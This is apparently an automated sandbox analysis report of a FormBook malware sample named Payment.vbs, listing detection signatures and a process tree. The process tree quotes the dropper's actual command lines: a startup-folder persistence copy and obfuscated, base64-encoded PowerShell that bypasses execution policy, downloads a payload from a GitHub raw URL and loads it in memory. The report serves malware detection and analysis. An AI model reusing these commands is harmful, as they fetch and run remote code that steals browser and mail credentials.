Analysis Report: Payment.vbs (Windows)
Overview
General Information
Detection
FormBook
Score | 100 |
---|---|
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 4176 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 1340 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
- powershell.exe (PID: 1584 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 2436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))" MD5: 04029E121A0CFA5991749937DD22A1D9)
- appidtel.exe (PID: 1052 cmdline: "C:\Windows\SysWOW64\appidtel.exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
- mNqSPruzCXM.exe (PID: 7160 cmdline: "C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
- convert.exe (PID: 5292 cmdline: "C:\Windows\SysWOW64\convert.exe" MD5: 2B1AC34AB72C95793CFE7E936F15389D)
- mNqSPruzCXM.exe (PID: 3196 cmdline: "C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
- firefox.exe (PID: 1756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- svchost.exe (PID: 5708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |

(11 Yara entries in total; only the rows above, which repeat for each matched source, were captured.)
System Summary

Source | Author |
---|---|
 | Florian Roth (Nextron Systems) |